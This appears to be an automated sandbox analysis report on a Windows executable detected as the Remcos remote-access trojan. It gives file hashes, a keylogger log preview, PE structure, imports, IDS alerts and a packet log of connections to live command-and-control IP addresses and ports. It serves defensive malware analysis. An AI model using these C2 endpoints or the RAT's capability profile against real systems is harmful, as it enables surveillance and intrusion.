                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                  Malicious:false
                                                                  Preview:..
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):519984
                                                                  Entropy (8bit):5.97310447226679
                                                                  Encrypted:false
                                                                  SSDEEP:6144:ZhZQKJ7e1+X814RJz1/sEa4Gv9hbtE9XcA4009r0KOD7hXDd+NayYrpqy2RtCPKZ:ZhJecX3jh/PGvrsXcAm0PdDdrEPR1Z
                                                                  MD5:047E0275BDD0927F6EFEF87097F21863
                                                                  SHA1:4299854E50DA9BF541FA2860DD03B635D7DFBA47
                                                                  SHA-256:E0E516EA98D02BC1529767D9C3524B6EC48342AF2C5A704CE976D5F2430DF1C2
                                                                  SHA-512:B094D60E78B9FD9C230BF53774BA3853321A37BE02174844B7B6B39B977641438310A14267A26977F4C88DB45E52AE5E6F0F98EBB74D8466E960FD1B958574E3
                                                                  Malicious:false
                                                                  Preview:2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4Vpzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4PZebdwetQhimmGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoPgaMAAAAPcvIpD2Tu60wy73FW9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX1mw9uwWYP/vDrRP8bZXdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dH3eHZ4etYLaRSf25ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubtn0D/7v600+Ib8dCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCrvYWg8A2f/Z/utL832YKDc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3
                                                                  Process:C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):184
                                                                  Entropy (8bit):3.3690916117864877
                                                                  Encrypted:false
                                                                  SSDEEP:3:rhlKlVjfPla2Q55JWRal2Jl+7R0DAlBG4phlKlVjfPlaNPQblovDl6v:6lVc55YcIeeDAlMlVXbWAv
                                                                  MD5:FDCF4E71514F078FBDFC664B6E8F44EB
                                                                  SHA1:EDEE683C95ED072FE260947F16227908E8D750C6
                                                                  SHA-256:5CDA14046C54A8F3B24B2C4D87E3A36023CB5F743DCE160AE9B2F2692EC3EF8F
                                                                  SHA-512:ADD471104822B0861C6DF2033AFA707C931EF7BB5CBA7E69F18181BDEEAB5B65FE621015A28E1A8591CCE03E19BAA83E9BE2AB2F27930FFEF7B666E98D586D40
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
                                                                  Preview:....[.2.0.2.4./.0.7./.2.6. .0.9.:.4.6.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.2.6. .0.9.:.4.6.:.5.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.599837418393476
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  File size:494'592 bytes
                                                                  MD5:3ad8cb387874a15488508bf269fd2520
                                                                  SHA1:e083d92b7f1668b105c18ce5772caccc8705b903
                                                                  SHA256:1b97d7dd602a1a105948d1607a6c8bc2014eb752078e35f839b4a5c5095a4e90
                                                                  SHA512:f29a3edb3ba480d5fb17e4b4f96f3b7b2dd09805cc0f31eef5f2199b107ad36dbf7be156f6fee3bf0747566001f21e2ececcf4e943b75c9aea42462ed98c94fe
                                                                  SSDEEP:6144:wXIktXfM8Lv86r9uVWAa2je4Z5zl4hgDHQQs4NTQjoHFsAOZZoAX0cNs5Gv:wX7tPMK8ctGe4Dzl4h2QnuPs/Zo9cv
                                                                  TLSH:D9B49E01BAD1C072D57524300D3AF776EAB8BD2028364A7B73D61D5BFE31190B62A6B7
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-H..~H..~H..~.f$~[..~.f&~...~.f'~V..~A.Q~I..~.Z.~J..~....R..~....r..~....j..~A.F~Q..~H..~u..~....,..~..*~I..~....I..~RichH..
                                                                  Icon Hash:95694d05214c1b33
                                                                  Entrypoint:0x4349ef
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x667FC315 [Sat Jun 29 08:17:25 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:8d5087ff5de35c3fbb9f212b47d63cad
                                                                  Instruction
                                                                  call 00007F38B07FE0DCh
                                                                  jmp 00007F38B07FDAF3h
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  sub esp, 00000324h
                                                                  push ebx
                                                                  push esi
                                                                  push 00000017h
                                                                  call 00007F38B0820354h
                                                                  test eax, eax
                                                                  je 00007F38B07FDC67h
                                                                  mov ecx, dword ptr [ebp+08h]
                                                                  int 29h
                                                                  xor esi, esi
                                                                  lea eax, dword ptr [ebp-00000324h]
                                                                  push 000002CCh
                                                                  push esi
                                                                  push eax
                                                                  mov dword ptr [00471D14h], esi
                                                                  call 00007F38B08000C7h
                                                                  add esp, 0Ch
                                                                  mov dword ptr [ebp-00000274h], eax
                                                                  mov dword ptr [ebp-00000278h], ecx
                                                                  mov dword ptr [ebp-0000027Ch], edx
                                                                  mov dword ptr [ebp-00000280h], ebx
                                                                  mov dword ptr [ebp-00000284h], esi
                                                                  mov dword ptr [ebp-00000288h], edi
                                                                  mov word ptr [ebp-0000025Ch], ss
                                                                  mov word ptr [ebp-00000268h], cs
                                                                  mov word ptr [ebp-0000028Ch], ds
                                                                  mov word ptr [ebp-00000290h], es
                                                                  mov word ptr [ebp-00000294h], fs
                                                                  mov word ptr [ebp-00000298h], gs
                                                                  pushfd
                                                                  pop dword ptr [ebp-00000264h]
                                                                  mov eax, dword ptr [ebp+04h]
                                                                  mov dword ptr [ebp-0000026Ch], eax
                                                                  lea eax, dword ptr [ebp+04h]
                                                                  mov dword ptr [ebp-00000260h], eax
                                                                  mov dword ptr [ebp-00000324h], 00010001h
                                                                  mov eax, dword ptr [eax-04h]
                                                                  push 00000050h
                                                                  mov dword ptr [ebp-00000270h], eax
                                                                  lea eax, dword ptr [ebp-58h]
                                                                  push esi
                                                                  push eax
                                                                  call 00007F38B080003Eh
                                                                  Programming Language:
                                                                  • [C++] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6eea80x104.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4bac.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bcc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3400x38.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x6d3d40x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3780x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x590000x4fc.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x571750x57200f959ed65f49a903603bc150bbb7292aaFalse0.571329694225251data6.62552167894442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x590000x179b60x17a000b1b376d3af457a8126e1464e669f45cFalse0.5005993716931217Zebra Metafile graphic (comment = \210\002\007)5.859520729145511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x710000x5d440xe00fa1a169b9414830def88848af87110b5False0.22154017857142858data3.00580031855032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .gfids0x780000x2300x40009e4699aa75951ab53e804fe4f9a3b6bFalse0.3271484375data2.349075166240886IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x790000x4bac0x4c003f463bc1359c85af30c9104be18c6449False0.28885690789473684data3.9920543392444308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x7e0000x3bcc0x3c000a6e61b09628beca43d4bf9604f65238False0.7639973958333334data6.718533933603825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                                  RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                                  RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                                  RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                                  RT_RCDATA0x7d5cc0x59fdata1.0076441973592773
                                                                  RT_GROUP_ICON0x7db6c0x3edataEnglishUnited States0.8064516129032258
                                                                  DLLImport
                                                                  KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, TlsAlloc, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                                                                  USER32.dllGetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, GetMessageA, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, DispatchMessageA, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, GetIconInfo, GetSystemMetrics, AppendMenuA, RegisterClassExA, GetCursorPos, SetForegroundWindow, DrawIcon, SystemParametersInfoW
                                                                  GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                                                                  ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                                                                  SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                                  ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                                                                  SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                                                                  WINMM.dllwaveInUnprepareHeader, waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader
                                                                  WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                                                  urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                                  gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                                                  WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                  2024-07-26T15:47:17.348366+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971940.127.169.103192.168.2.6
                                                                  2024-07-26T15:47:46.464115+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436084440.127.169.103192.168.2.6
                                                                  2024-07-26T15:47:17.073744+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49718443192.168.2.693.113.54.56
                                                                  2024-07-26T15:47:10.549159+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434971693.113.54.56192.168.2.6
                                                                  2024-07-26T15:46:57.550213+0200TCP2032776ET MALWARE Remcos 3.x Unencrypted Checkin4971057484192.168.2.6192.253.251.227
                                                                  2024-07-26T15:46:59.104341+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response5748449710192.253.251.227192.168.2.6
                                                                  2024-07-26T15:51:01.217929+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response5748449710192.253.251.227192.168.2.6
                                                                  2024-07-26T15:49:00.094689+0200TCP2032777ET MALWARE Remcos 3.x Unencrypted Server Response5748449710192.253.251.227192.168.2.6
                                                                  2024-07-26T15:47:17.199149+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434971893.113.54.56192.168.2.6
                                                                  2024-07-26T15:47:01.925387+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4971380192.168.2.6178.237.33.50
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 26, 2024 15:46:57.540724993 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:46:57.549174070 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:46:57.549300909 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:46:57.550213099 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:46:57.558067083 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:46:59.104341030 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:46:59.106019974 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:46:59.114005089 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.564738989 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.564785004 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.564878941 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.564989090 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.565234900 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.565304041 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.565382957 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.576503992 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.578999996 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.582839966 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.582931995 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.584148884 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.584213972 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.595882893 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.595992088 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:00.602545977 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:00.602659941 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:01.281594992 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:47:01.287472010 CEST8049713178.237.33.50192.168.2.6
                                                                  Jul 26, 2024 15:47:01.287592888 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:47:01.287750006 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:47:01.294744015 CEST8049713178.237.33.50192.168.2.6
                                                                  Jul 26, 2024 15:47:01.925321102 CEST8049713178.237.33.50192.168.2.6
                                                                  Jul 26, 2024 15:47:01.925386906 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:47:01.991558075 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:01.996819973 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003120899 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003282070 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003298998 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003331900 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.003842115 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003858089 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.003891945 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.018215895 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.018345118 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.018361092 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.018402100 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.018717051 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.018733025 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.018759012 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.048192978 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.063817978 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.485064983 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485176086 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485193968 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485239983 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.485640049 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485656023 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485671997 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.485696077 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.485726118 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.486088991 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.486104965 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.486148119 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.508047104 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508064032 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508079052 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508116007 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.508467913 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508514881 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.508538961 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508554935 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508572102 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.508598089 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.510674000 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.510690928 CEST5748449711192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.510724068 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.563822985 CEST4971157484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.571803093 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.572874069 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.572933912 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.927448988 CEST8049713178.237.33.50192.168.2.6
                                                                  Jul 26, 2024 15:47:02.927634954 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:47:02.968797922 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.968933105 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.968950987 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969084978 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.969257116 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969309092 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.969460964 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969480038 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969521046 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.969736099 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969774008 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969789982 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969803095 CEST5748449712192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:02.969818115 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:02.969837904 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:03.106132984 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:03.329472065 CEST4971257484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:03.641961098 CEST4971257484192.168.2.6192.253.251.227
